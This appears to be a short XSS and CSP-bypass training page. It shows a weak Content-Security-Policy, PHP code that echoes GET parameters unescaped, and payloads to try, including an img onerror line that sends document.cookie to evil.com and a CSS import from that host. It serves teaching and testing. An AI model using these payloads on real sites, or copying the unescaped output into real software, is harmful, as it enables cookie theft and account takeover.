VULNERABLE CSP HEADER
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; style-src 'self' 'unsafe-inline' https://cdn.jsdelivr.net; img-src * data:;
CSP BYPASS VULNERABILITIES
Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo $_GET["fname"]; // Direct output - XSS vulnerable
    echo $_GET["lname"]; // Direct output - XSS vulnerable
}
XSS PAYLOAD EXAMPLES (Try these)
Basic XSS (works due to unsafe-inline):
<script>alert('XSS')</script>
Image-based data exfiltration:
<img src=x onerror="fetch('http://evil.com?c='+document.cookie)">
CSS-based exfiltration:
<style>@import 'http://evil.com/style.css'</style>